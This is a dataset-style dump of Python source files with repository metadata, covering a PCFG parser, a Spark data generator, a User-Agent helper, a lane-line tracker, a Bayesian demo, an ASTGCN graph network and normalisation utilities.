hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
33c9781fcf45373b7d579f4efc46dbb1d61f2088 | 2,781 | py | Python | nlppcfg.py | mrlongzhang/classicnlp | 99b8e7a103c386d8950536eae45a1fa7291968df | [
"MIT"
] | null | null | null | nlppcfg.py | mrlongzhang/classicnlp | 99b8e7a103c386d8950536eae45a1fa7291968df | [
"MIT"
] | null | null | null | nlppcfg.py | mrlongzhang/classicnlp | 99b8e7a103c386d8950536eae45a1fa7291968df | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
A Probabiltics Context Free Grammer (PCFG) Parser using Python.
This code implemented a weighted graph search
@author: Zhang Long
"""
import codecs
from collections import defaultdict
import math
f_grammer=".\\test\\08-grammar.txt"
nonterm=[]
preterm=defaultdict(list)
grammer_file=codecs.open(f_grammer, 'r','utf-8')
index = 0
for rule in grammer_file:
words = rule.split('\t')
lhs = words[0]
rhs = words[1]
prob = float(words[2])
rhs_symbols=rhs.split(' ')
if len(rhs_symbols) == 1:
preterm[rhs].append([lhs, math.log(prob)])
else:
nonterm.insert(index,[lhs, rhs_symbols[0], rhs_symbols[1],math.log(prob)])
# add pre-terminals
f_text=".\\test\\08-input.txt"
text_file=codecs.open(f_text, 'r', 'utf-8')
# init best score with lowest level
best_score=defaultdict(lambda: float('-inf'))
best_edge={}
for line in text_file:
words = line.split(' ')
for i in range(len(words)):
word = words[i].strip()
for item in (preterm[word]):
lhs = item[0]
log_prob = item[1]
ibs = lhs + ' ' + str(i) + ' ' + str(i+1)
best_score[ibs] = (log_prob)
text_file.close()
#cyk, calculate the rest levels
text_file=codecs.open(f_text,'r','utf-8')
my_lp = float('-inf')
for j in range(2, len(words)+1):
for i in range(j-2, -1, -1):
for k in range(i+1, j):
# rules in grammer table
for nrul in range(len(nonterm)):
sym=nonterm[nrul][0]
lsym=nonterm[nrul][1]
rsym=nonterm[nrul][2]
logprob =nonterm[nrul][3]
ilsym = lsym +' ' + str(i) + ' ' + str(k)
irsym = rsym +' ' + str(k) + ' ' + str(j)
if best_score[ilsym] > float('-inf') and best_score[irsym] > float('-inf'):
my_lp = best_score[ilsym] + best_score[irsym] + logprob
isymi = sym + ' ' + str(i) + ' ' + str(j)
if(my_lp > best_score[isymi]):
best_score[isymi] = my_lp
best_edge[isymi] = [ilsym,irsym]
def Print(sym, best_edge, words):
if sym in best_edge:
symp = sym.split(' ')[0]
return "("+symp+" " \
+Print(best_edge[sym][0], best_edge, words) +" " + Print(best_edge[sym][1],best_edge, words) \
+ ")"
else:
i = sym.split(' ')[1]
symp = sym.split(' ')[0]
return "(" + sym + " " + words[int(i)]+")"
print(Print('S 0 7',best_edge,words))
def main():
pass
# Any code you like
if __name__ == '__main__':
main() | 30.56044 | 107 | 0.51708 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 482 | 0.173319 |
33c9c1f3e9820356f08403598edffbaf83060a2e | 2,876 | py | Python | generator.py | elieahd/data-analytics-kmeans | df44da132cf0de00d870b8865781f4fd78113cfa | [
"MIT"
] | 2 | 2020-10-09T20:13:00.000Z | 2021-06-06T09:18:33.000Z | generator.py | elieahd/data-analytics-kmeans | df44da132cf0de00d870b8865781f4fd78113cfa | [
"MIT"
] | null | null | null | generator.py | elieahd/data-analytics-kmeans | df44da132cf0de00d870b8865781f4fd78113cfa | [
"MIT"
] | 2 | 2018-06-06T08:33:03.000Z | 2018-06-06T09:00:47.000Z | # spark-submit generator.py out 9 3 2 10
# imports
import sys
import random
import numpy
from pyspark import SparkContext
from pyspark.mllib.random import RandomRDDs
# constants
MIN_MEAN_VALUE = 0
MAX_MEAN_VALUE = 100
STEPS = 0.1
# methods
def point_values(means_value, normal_value, std, cluster, dimension):
values = ""
for d in range(dimension):
value = means_value[d] + normal_value[d] * std
if not values:
values = str(value)
else:
values = values + "," + str(value)
return (values + "," + str(cluster))
def write_into_csv(file_name, rdd):
with open(file_name,'wb') as file:
for row in rdd.collect():
file.write(row)
file.write('\n')
# main code
if len(sys.argv) != 6:
print("6 arguments are needed :")
print(" * file name of the code generator.py")
print(" * file name to be generated e.g. output")
print(" * number of points to be generated e.g. 9")
print(" * number of clusters e.g. 3")
print(" * dimension of the data e.g. 2")
print(" * standard deviation e.g. 10\n")
print("Try executing the following command : spark-submit generator.py out 9 3 2 10")
exit(0)
# inputs
file_name = sys.argv[1] + '.csv' # file name to be generated
points = int(sys.argv[2]) # number of points to be generated
count_cluster = int(sys.argv[3]) # number of clusters
dimension = int(sys.argv[4]) # dimension of the data
std = int(sys.argv[5]) # standard deviation
noise_points = points * 2 # number of noise points to be generated / double the number of points
sc = SparkContext("local", "generator") # spark context
# array of the clusters : clusters = [0, 1, 2]
clusters = sc.parallelize(range(0, count_cluster))
# random means of each cluster : means_cluster = [ (0, [0.6, 80.9]), (1, [57.8, 20.2]), (2, [15.6, 49.9]) ]
means_cluster = clusters.map(lambda cluster : (cluster, random.sample(numpy.arange(MIN_MEAN_VALUE, MAX_MEAN_VALUE, STEPS), dimension)))
# creating random vector using normalVectorRDD
random_values_vector = RandomRDDs.normalVectorRDD(sc, numRows = points, numCols = dimension, numPartitions = count_cluster, seed = 1L)
# assiging a random cluster for each point
cluster_normal_values_vector = random_values_vector.map(lambda point : (random.randint(0, count_cluster - 1), point.tolist()))
# generate a value depending of the mean of the cluster, standard deviation and the normal value
points_value_vector = cluster_normal_values_vector.join(means_cluster).map(lambda (cluster, (normal_value, means_value)): (point_values(means_value, normal_value, std, cluster, dimension)))
# printing result in console
# print(points_value_vector.collect())
# writing points value in a 1 csv file
# write_into_csv(file_name, points_value_vector);
# saving rdd using saveAsTextFile
points_value_vector.saveAsTextFile(file_name) | 37.842105 | 189 | 0.705494 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,189 | 0.413421 |
33cab9736c2b33f9dc7ebf54dc2179461c98e762 | 1,263 | py | Python | testtool.py | andreasscherbaum/pg_commitfest_testtool | 4e40ef441401faddc34861a92f41a9ca60c7560c | [
"BSD-3-Clause"
] | 1 | 2017-10-26T13:52:53.000Z | 2017-10-26T13:52:53.000Z | testtool.py | andreasscherbaum/pg_commitfest_testtool | 4e40ef441401faddc34861a92f41a9ca60c7560c | [
"BSD-3-Clause"
] | null | null | null | testtool.py | andreasscherbaum/pg_commitfest_testtool | 4e40ef441401faddc34861a92f41a9ca60c7560c | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
#
# test tool for PostgreSQL Commitfest website
#
# written by: Andreas Scherbaum <ads@pgug.de>
#
import re
import os
import sys
import logging
import tempfile
import atexit
import shutil
import time
import subprocess
from subprocess import Popen
import socket
import sqlite3
import datetime
from time import gmtime, localtime, strftime
# config functions
from config import Config
import copy
# start with 'info', can be overriden by '-q' later on
logging.basicConfig(level = logging.INFO,
format = '%(levelname)s: %(message)s')
# exit_handler()
#
# exit handler, called upon exit of the script
# main job: remove the temp directory
#
# parameters:
# none
# return:
# none
def exit_handler():
# do something in the end ...
pass
# register exit handler
atexit.register(exit_handler)
#######################################################################
# main code
# config todo:
# * test technology (Docker, LXC, ...)
config = Config()
config.parse_parameters()
config.load_config()
config.build_and_verify_config()
# by now the lockfile is acquired, there is no other instance running
# before starting new jobs, cleanup remaining old ones
# startup
config.cleanup_old_dirs_and_files()
# main mode
| 16.402597 | 71 | 0.699129 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 680 | 0.538401 |
33ccafc8a5799e67020bb35fde701098ce38149a | 856 | py | Python | coronavirus/common/user_agent.py | StevenHuang2020/WebSpider | 40ab36416e061da3eb98a3174f18f50260b2e2d3 | [
"MIT"
] | null | null | null | coronavirus/common/user_agent.py | StevenHuang2020/WebSpider | 40ab36416e061da3eb98a3174f18f50260b2e2d3 | [
"MIT"
] | null | null | null | coronavirus/common/user_agent.py | StevenHuang2020/WebSpider | 40ab36416e061da3eb98a3174f18f50260b2e2d3 | [
"MIT"
] | null | null | null | import random
from fake_useragent import UserAgent
agent_list = '''Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'''
def random_agent():
headers = agent_list.split('\n')
length = len(headers)
return headers[random.randint(0, length - 1)]
def get_random_agent():
ua = UserAgent(cache=False).random
#print(ua)
return ua
def main():
# agent = get_random_agent()
agent = random_agent()
print('agent=', agent)
if __name__ == "__main__":
main()
| 27.612903 | 137 | 0.682243 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 480 | 0.560748 |
33cd25b6dee7d0d8f2865e1649e038cc3d930d13 | 5,078 | py | Python | line.py | jurlaub/jubilant-fedora | 829432ff4fb8b3972ad5a1a152ecf6f1f7e94f9b | [
"MIT"
] | null | null | null | line.py | jurlaub/jubilant-fedora | 829432ff4fb8b3972ad5a1a152ecf6f1f7e94f9b | [
"MIT"
] | null | null | null | line.py | jurlaub/jubilant-fedora | 829432ff4fb8b3972ad5a1a152ecf6f1f7e94f9b | [
"MIT"
] | null | null | null |
import numpy as np
from collections import deque
QLEN = 8
class Line(object):
""" from #2.Tips and Tricks for the Project """
def __init__(self, yp=None, xp=None):
self.ym_per_pix = yp
self.xm_per_pix = xp
# self.frame_shape = fs
# was the line detected in the last iteration?
self.detected = False
# --- self.left_fitx & self.right_fitx
# x values of the last n fits of the line
# self.recent_xfitted = []
self.recent_xfitted = deque(maxlen=QLEN)
#average x values of the fitted line over the last n iterations
self.bestx = None
# --- using polyfit self.lfit & self.rfit
#polynomial coefficients averaged over the last n iterations
self.best_fit = None
self.best_fitQ = deque(maxlen=QLEN)
#difference in fit coefficients between last and new fits
self.diffs = np.array([0,0,0], dtype='float')
self.diffs_prev = np.array([0,0,0], dtype='float')
# --- values for a given frame, may not be used ----
# --- polyfit self.lfit & self.rfit
#polynomial coefficients for the most recent fit
self.current_fit = [np.array([False])]
#radius of curvature of the line in some units
self.radius_of_curvature = None # m
#distance in meters of line from edge
self.line_base_pos = None
# --- leftx ?
#x values for detected line pixels
self.allx = None
# --- lefty ?
#y values for detected line pixels
self.ally = None
self.line_fitx = None
# ---
def add_all_pixels(self, ax, ay, warp_shape):
self.allx = ax
self.ally = ay
# print("add_all_pixels-shape:{}".format(warp_shape))
if ((len(self.ally) == 0) or (len(self.allx) == 0)):
self.detected = False
else:
self._fit_line_polynomial(warp_shape)
def use_starting_values(self):
""" Starting values are used for the first frame and to realign the values
when a detected position goes off track
"""
self.detected = True
self.recent_xfitted.append(self.line_fitx)
self.bestx = self.line_fitx
self.best_fit = self.current_fit
self.best_fitQ.append(self.current_fit)
# print("use_starting_values-best_fit:{}".format(self.best_fit))
def use_staged_values(self):
""" Staged values are typically used for most frames. It takes the 'temporary'
values calculated by _fit_line_polynomial() and updates the line deque's and the
averaged values.
"""
# self.detected = True
# self.detected = True
self.recent_xfitted.append(self.line_fitx)
if (len(self.recent_xfitted)> QLEN):
self.recent_xfitted.popleft()
# self.bestx = self.line_fitx
self.bestx = np.mean(self.recent_xfitted, axis=0)
self.best_fitQ.append(self.current_fit)
if (len(self.best_fitQ)> QLEN):
self.best_fitQ.popleft()
self.best_fit = np.mean(self.best_fitQ, axis=0)
# print("\n{:.2f}:current_fit:{}".format(self.line_base_pos, self.current_fit))
# print("{:.2f}:best_fit:{}".format(self.line_base_pos, self.best_fit))
a = self.best_fitQ[0]
b = self.best_fitQ[-1]
self.diff = np.polysub(a, b)
self.diffs_prev = np.polysub(self.best_fitQ[-2], self.current_fit)
# print("{:.2f}:diff:{}".format(self.line_base_pos, self.diff))
# print("len:{}".format(len(self.best_fitQ)))
def discard_staged_values(self):
self.detected = False
def _fit_line_polynomial(self, frame_shape):
""" from lesson 9.4
Combined the polyfit(), lines, curves and other calculations into this
single method as all the necessary data was right here.
"""
# --- coefficients of line
line_fit = np.polyfit(self.ally, self.allx, 2)
_ploty = np.linspace(0, frame_shape[0]-1, frame_shape[0])
try:
# x points of line
line_fitx = line_fit[0]*_ploty**2 + line_fit[1]*_ploty + line_fit[2]
x_intercept = line_fit[0]*frame_shape[0]**2 + line_fit[1]*frame_shape[0] + line_fit[2]
except TypeError:
line_fitx = 1*_ploty**2 + 1*_ploty
x_intercept = 0
# --- curvature recalculate to convert from pixels to meters--
y_eval = np.max(_ploty)*self.ym_per_pix # convert from p to m
line_fit_m = np.polyfit((self.ally*self.ym_per_pix), (self.allx*self.xm_per_pix), 2) # convert from p to m
radius_curve = (np.sqrt (np.power((1+((2*line_fit_m[0]*y_eval)+(line_fit_m[1] ))**2), 3))) / abs(2*((line_fit_m[0])))
self.line_base_pos = x_intercept * self.xm_per_pix # np.max(line_fitx) # abs(((frame_shape[1]/2)-(np.max(line_fitx)))) * self.xm_per_pix
self.current_fit = line_fit
self.radius_of_curvature = radius_curve # (radius_curve * self.ym_per_pix)
self.line_fitx = line_fitx
| 35.51049 | 144 | 0.613037 | 5,012 | 0.987003 | 0 | 0 | 0 | 0 | 0 | 0 | 2,012 | 0.396219 |
33cd7255bbba76e2a841f4c023d7958020291128 | 2,730 | py | Python | ex2_graph/tut2_infer_sigma.py | trungnt13/uef_bay1_2018 | 48a0f684eb4d18777d9f03998233774baa0524a8 | [
"MIT"
] | null | null | null | ex2_graph/tut2_infer_sigma.py | trungnt13/uef_bay1_2018 | 48a0f684eb4d18777d9f03998233774baa0524a8 | [
"MIT"
] | 1 | 2018-11-30T16:36:40.000Z | 2018-11-30T16:36:40.000Z | ex2_graph/tut2_infer_sigma.py | trungnt13/uef_bay1_2018 | 48a0f684eb4d18777d9f03998233774baa0524a8 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import print_function, division, absolute_import
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
import seaborn as sns
import numpy as np
import tensorflow as tf
tf.enable_eager_execution()
import tensorflow_probability as tfp
from tensorflow_probability import edward2 as ed
tfd = tfp.distributions
# ===========================================================================
# Constant
# ===========================================================================
a = 8
b = 0.5
mu = 0
n_samples = 100000
# ===========================================================================
# Following the generative procedure
# ===========================================================================
# Step 1: generate the precision Beta
beta_dist = tfd.Gamma(concentration=a, rate=b)
beta = beta_dist.sample(n_samples)
# the prior probability
p_beta_given_a_and_b = beta_dist.prob(beta)
# Step 2: generate the data point
# scale is standard deviation
x_dist = tfd.Normal(loc=mu, scale=tf.sqrt(1 / beta))
x = x_dist.sample()
# the likelihood
p_x_given_mu_and_beta = x_dist.prob(x)
# ====== plotting the prior ====== #
plt.figure()
sns.distplot(beta.numpy(), bins=120, kde=True)
plt.title(r"Prior distribution: $p(\beta|a=%g, b=%g)$" % (a, b))
# ====== plotting the likelihood ====== #
plt.figure()
sns.distplot(x.numpy(), bins=120, kde=True)
plt.title(r"Likelihood distribution: $p(X|\mu=%g, \sigma=\sqrt{\beta^{-1}})$" % mu)
# ====== plotting the posterior ====== #
# the posterior probability, this is only
# proportionally, not exactly because we omit
# the evidence p(X)
# If we want to calculate p(X), we need to marginalize out
# beta using sum rule:
# p(X) = p(X, beta_1) + p(X, beta_2) + ... + p(X, beta_∞)
# This is not easy
p_beta_given_x = p_x_given_mu_and_beta * p_beta_given_a_and_b
p_beta_given_x = p_beta_given_x / tf.reduce_sum(p_beta_given_x)
posterior_dist = tfd.Categorical(probs=p_beta_given_x)
beta = beta.numpy()
posterior = []
for i in range(n_samples // 2000):
idx = posterior_dist.sample(2000).numpy()
posterior.append(beta[idx])
posterior = np.concatenate(posterior)
plt.figure()
sns.distplot(posterior, bins=120, kde=True)
plt.title(r"Sampled posterior distribution: $p(\beta|X)$")
# ====== plotting the close form solution ====== #
a0 = a + n_samples / 2
b0 = b + n_samples / 2 * np.var(x.numpy())
posterior_dist = tfd.Gamma(concentration=a0, rate=b0)
posterior = posterior_dist.sample(n_samples)
plt.figure()
sns.distplot(posterior, bins=120, kde=True)
plt.title(
r"Closed form solution: $p(\beta|X) \sim Gamma(a=%g, b=%g)$"
% (a0, b0))
from odin import visual as V
V.plot_save('/tmp/tmp.pdf', dpi=200)
| 30.674157 | 83 | 0.631502 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,183 | 0.433016 |
33ce3133c0c71236885386e8ce693950822b09d3 | 10,625 | py | Python | torch_geometric_temporal/nn/convolutional/astgcn.py | LFrancesco/pytorch_geometric_temporal | 0964515a6041ce0cceb12e36ed640df22c046b4d | [
"MIT"
] | null | null | null | torch_geometric_temporal/nn/convolutional/astgcn.py | LFrancesco/pytorch_geometric_temporal | 0964515a6041ce0cceb12e36ed640df22c046b4d | [
"MIT"
] | null | null | null | torch_geometric_temporal/nn/convolutional/astgcn.py | LFrancesco/pytorch_geometric_temporal | 0964515a6041ce0cceb12e36ed640df22c046b4d | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
from torch_geometric.transforms import LaplacianLambdaMax
from torch_geometric.data import Data
from .chebconvatt import ChebConvAtt
class Spatial_Attention_layer(nn.Module):
'''
compute spatial attention scores
'''
def __init__(self, in_channels, num_of_vertices, num_of_timesteps):
super(Spatial_Attention_layer, self).__init__()
self.W1 = nn.Parameter(torch.FloatTensor(num_of_timesteps))
self.W2 = nn.Parameter(torch.FloatTensor(in_channels, num_of_timesteps))
self.W3 = nn.Parameter(torch.FloatTensor(in_channels))
self.bs = nn.Parameter(torch.FloatTensor(1, num_of_vertices, num_of_vertices))
self.Vs = nn.Parameter(torch.FloatTensor(num_of_vertices, num_of_vertices))
self.reset_parameters()
def reset_parameters(self):
for p in self.parameters():
if p.dim() > 1:
nn.init.xavier_uniform_(p)
else:
nn.init.uniform_(p)
def forward(self, x):
"""
Making a forward pass of the spatial attention layer.
B is the batch size. N_nodes is the number of nodes in the graph. F_in is the dimension of input features.
T_in is the length of input sequence in time.
Arg types:
* x (PyTorch Float Tensor) - Node features for T time periods, with shape (B, N_nodes, F_in, T_in).
Return types:
* output (PyTorch Float Tensor) - Spatial attention score matrices, with shape (B, N_nodes, N_nodes).
"""
lhs = torch.matmul(torch.matmul(x, self.W1), self.W2) # (b,N,F,T)(T)->(b,N,F)(F,T)->(b,N,T)
rhs = torch.matmul(self.W3, x).transpose(-1, -2) # (F)(b,N,F,T)->(b,N,T)->(b,T,N)
product = torch.matmul(lhs, rhs) # (b,N,T)(b,T,N) -> (B, N, N)
S = torch.matmul(self.Vs, torch.sigmoid(product + self.bs)) # (N,N)(B, N, N)->(B,N,N)
S_normalized = F.softmax(S, dim=1)
return S_normalized
class Temporal_Attention_layer(nn.Module):
def __init__(self, in_channels, num_of_vertices, num_of_timesteps):
super(Temporal_Attention_layer, self).__init__()
self.U1 = nn.Parameter(torch.FloatTensor(num_of_vertices))
self.U2 = nn.Parameter(torch.FloatTensor(in_channels, num_of_vertices))
self.U3 = nn.Parameter(torch.FloatTensor(in_channels))
self.be = nn.Parameter(torch.FloatTensor(1, num_of_timesteps, num_of_timesteps))
self.Ve = nn.Parameter(torch.FloatTensor(num_of_timesteps, num_of_timesteps))
self.reset_parameters()
def reset_parameters(self):
for p in self.parameters():
if p.dim() > 1:
nn.init.xavier_uniform_(p)
else:
nn.init.uniform_(p)
def forward(self, x):
"""
Making a forward pass of the temporal attention layer.
B is the batch size. N_nodes is the number of nodes in the graph. F_in is the dimension of input features.
T_in is the length of input sequence in time.
Arg types:
* x (PyTorch Float Tensor) - Node features for T time periods, with shape (B, N_nodes, F_in, T_in).
Return types:
* output (PyTorch Float Tensor) - Temporal attention score matrices, with shape (B, T_in, T_in).
"""
_, num_of_vertices, num_of_features, num_of_timesteps = x.shape
lhs = torch.matmul(torch.matmul(x.permute(0, 3, 2, 1), self.U1), self.U2)
# x:(B, N, F_in, T) -> (B, T, F_in, N)
# (B, T, F_in, N)(N) -> (B,T,F_in)
# (B,T,F_in)(F_in,N)->(B,T,N)
rhs = torch.matmul(self.U3, x) # (F)(B,N,F,T)->(B, N, T)
product = torch.matmul(lhs, rhs) # (B,T,N)(B,N,T)->(B,T,T)
E = torch.matmul(self.Ve, torch.sigmoid(product + self.be)) # (B, T, T)
E_normalized = F.softmax(E, dim=1)
return E_normalized
class ASTGCN_block(nn.Module):
def __init__(self, in_channels, K, nb_chev_filter, nb_time_filter, time_strides, num_of_vertices, num_of_timesteps):
super(ASTGCN_block, self).__init__()
self.TAt = Temporal_Attention_layer(in_channels, num_of_vertices, num_of_timesteps)
self.SAt = Spatial_Attention_layer(in_channels, num_of_vertices, num_of_timesteps)
self.cheb_conv_SAt = ChebConvAtt(in_channels, nb_chev_filter, K)
self.time_conv = nn.Conv2d(nb_chev_filter, nb_time_filter, kernel_size=(1, 3), stride=(1, time_strides), padding=(0, 1))
self.residual_conv = nn.Conv2d(in_channels, nb_time_filter, kernel_size=(1, 1), stride=(1, time_strides))
self.ln = nn.LayerNorm(nb_time_filter) #need to put channel to the last dimension
self.reset_parameters()
def reset_parameters(self):
for p in self.parameters():
if p.dim() > 1:
nn.init.xavier_uniform_(p)
else:
nn.init.uniform_(p)
def forward(self, x, edge_index):
"""
Making a forward pass. This is one ASTGCN block.
B is the batch size. N_nodes is the number of nodes in the graph. F_in is the dimension of input features.
T_in is the length of input sequence in time. T_out is the length of output sequence in time.
nb_time_filter is the number of time filters used.
Arg types:
* x (PyTorch Float Tensor) - Node features for T time periods, with shape (B, N_nodes, F_in, T_in).
* edge_index (Tensor): Edge indices, can be an array of a list of Tensor arrays, depending on whether edges change over time.
Return types:
* output (PyTorch Float Tensor) - Hidden state tensor for all nodes, with shape (B, N_nodes, nb_time_filter, T_out).
"""
batch_size, num_of_vertices, num_of_features, num_of_timesteps = x.shape
# TAt
temporal_At = self.TAt(x) # (b, T, T)
x_TAt = torch.matmul(x.reshape(batch_size, -1, num_of_timesteps), temporal_At).reshape(batch_size, num_of_vertices, num_of_features, num_of_timesteps)
# SAt
spatial_At = self.SAt(x_TAt)
# cheb gcn
if not isinstance(edge_index, list):
data = Data(edge_index=edge_index, edge_attr=None, num_nodes=num_of_vertices)
lambda_max = LaplacianLambdaMax()(data).lambda_max
outputs = []
for time_step in range(num_of_timesteps):
outputs.append(torch.unsqueeze(self.cheb_conv_SAt(x[:,:,:,time_step], edge_index, spatial_At, lambda_max = lambda_max), -1))
spatial_gcn = F.relu(torch.cat(outputs, dim=-1)) # (b,N,F,T) # (b,N,F,T)
else: # edge_index changes over time
outputs = []
for time_step in range(num_of_timesteps):
data = Data(edge_index=edge_index[time_step], edge_attr=None, num_nodes=num_of_vertices)
lambda_max = LaplacianLambdaMax()(data).lambda_max
outputs.append(torch.unsqueeze(self.cheb_conv_SAt(x=x[:,:,:,time_step], edge_index=edge_index[time_step],
spatial_attention=spatial_At,lambda_max=lambda_max), -1))
spatial_gcn = F.relu(torch.cat(outputs, dim=-1)) # (b,N,F,T)
# convolution along the time axis
time_conv_output = self.time_conv(spatial_gcn.permute(0, 2, 1, 3)) # (b,N,F,T)->(b,F,N,T) use kernel size (1,3)->(b,F,N,T)
# residual shortcut
x_residual = self.residual_conv(x.permute(0, 2, 1, 3)) # (b,N,F,T)->(b,F,N,T) use kernel size (1,1)->(b,F,N,T)
x_residual = self.ln(F.relu(x_residual + time_conv_output).permute(0, 3, 2, 1)).permute(0, 2, 3, 1)
# (b,F,N,T)->(b,T,N,F) -ln-> (b,T,N,F)->(b,N,F,T)
return x_residual
class ASTGCN(nn.Module):
r"""An implementation of the Attention Based Spatial-Temporal Graph Convolutional Cell.
For details see this paper: `"Attention Based Spatial-Temporal Graph Convolutional
Networks for Traffic Flow Forecasting." <https://ojs.aaai.org/index.php/AAAI/article/view/3881>`_
Args:
nb_block (int): Number of ASTGCN blocks in the model.
in_channels (int): Number of input features.
K (int): Order of Chebyshev polynomials. Degree is K-1.
nb_chev_filters (int): Number of Chebyshev filters.
nb_time_filters (int): Number of time filters.
time_strides (int): Time strides during temporal convolution.
edge_index (array): edge indices.
num_for_predict (int): Number of predictions to make in the future.
len_input (int): Length of the input sequence.
num_of_vertices (int): Number of vertices in the graph.
"""
def __init__(self, nb_block, in_channels, K, nb_chev_filter, nb_time_filter, time_strides, num_for_predict, len_input, num_of_vertices):
super(ASTGCN, self).__init__()
self.blocklist = nn.ModuleList([ASTGCN_block(in_channels, K, nb_chev_filter, nb_time_filter, time_strides, num_of_vertices, len_input)])
self.blocklist.extend([ASTGCN_block(nb_time_filter, K, nb_chev_filter, nb_time_filter, 1, num_of_vertices, len_input//time_strides) for _ in range(nb_block-1)])
self.final_conv = nn.Conv2d(int(len_input/time_strides), num_for_predict, kernel_size=(1, nb_time_filter))
self.reset_parameters()
def reset_parameters(self):
for p in self.parameters():
if p.dim() > 1:
nn.init.xavier_uniform_(p)
else:
nn.init.uniform_(p)
def forward(self, x, edge_index):
"""
Making a forward pass. This module takes a likst of ASTGCN blocks and use a final convolution to serve as a multi-component fusion.
B is the batch size. N_nodes is the number of nodes in the graph. F_in is the dimension of input features.
T_in is the length of input sequence in time. T_out is the length of output sequence in time.
Arg types:
* x (PyTorch Float Tensor) - Node features for T time periods, with shape (B, N_nodes, F_in, T_in).
* edge_index (Tensor): Edge indices, can be an array of a list of Tensor arrays, depending on whether edges change over time.
Return types:
* output (PyTorch Float Tensor)* - Hidden state tensor for all nodes, with shape (B, N_nodes, T_out).
"""
for block in self.blocklist:
x = block(x, edge_index)
output = self.final_conv(x.permute(0, 3, 1, 2))[:, :, :, -1].permute(0, 2, 1)
# (b,N,F,T)->(b,T,N,F)-conv<1,F>->(b,c_out*T,N,1)->(b,c_out*T,N)->(b,N,T)
return output
| 46.39738 | 168 | 0.640471 | 10,414 | 0.980141 | 0 | 0 | 0 | 0 | 0 | 0 | 4,245 | 0.399529 |
33d053c085065b6932239fd9d1894cd72e3ecc5e | 1,596 | py | Python | project1/src/utils/preprocessing.py | armand33/deep_learning_epfl | 238ed860716f013a30e29ebd4b0d9c4d0c67d011 | [
"MIT"
] | null | null | null | project1/src/utils/preprocessing.py | armand33/deep_learning_epfl | 238ed860716f013a30e29ebd4b0d9c4d0c67d011 | [
"MIT"
] | null | null | null | project1/src/utils/preprocessing.py | armand33/deep_learning_epfl | 238ed860716f013a30e29ebd4b0d9c4d0c67d011 | [
"MIT"
] | 2 | 2018-05-30T09:27:13.000Z | 2018-07-05T12:38:37.000Z | """
File defining the classes Normalize and Standardize used respectively to normalize and standardize the data set.
"""
class Normalize(object):
"""
Data pre-processing class to normalize data so the values are in the range [new_min, new_max].
"""
def __init__(self, min_, max_, new_min=0, new_max=1):
"""
Initializer.
:param min_: Min of the un-normalized data.
:param max_: Max of the un-normalized data.
:param new_min: Min of the new data.
:param new_max: Max of the new data.
"""
self.min = min_
self.max = max_
self.new_min = new_min
self.new_max = new_max
def __call__(self, data):
"""
Normalize a given data point.
:param data: Data point to normalize.
:return: Normalized data.
"""
data = (self.new_max - self.new_min)*(data - self.min)/(self.max - self.min) + self.new_min
return data
class Standardize(object):
"""
Data pre-processing class to standardize data so the values have a fixed mean and standard deviation.
"""
def __init__(self, mean, std):
"""
Initializer.
:param mean: Mean of the un-standardized data.
:param std: Std of the un-standardized data.
"""
self.mean = mean
self.std = std
def __call__(self, data):
"""
Standardize a given data point.
:param data: Data point to standardize.
:return: Standardized data.
"""
data = (data - self.mean)/self.std
return data
| 27.517241 | 112 | 0.592105 | 1,469 | 0.920426 | 0 | 0 | 0 | 0 | 0 | 0 | 993 | 0.62218 |
33d1491d6a521c55fdf5d9796d0dc3453bde5f3c | 5,522 | py | Python | coalaip/plugin.py | bigchaindb/pycoalaip | cecc8f6ff4733f0525fafcee63647753e832f0be | [
"Apache-2.0"
] | 20 | 2016-08-13T15:01:20.000Z | 2018-10-09T21:18:11.000Z | coalaip/plugin.py | imbi7py/pycoalaip | cecc8f6ff4733f0525fafcee63647753e832f0be | [
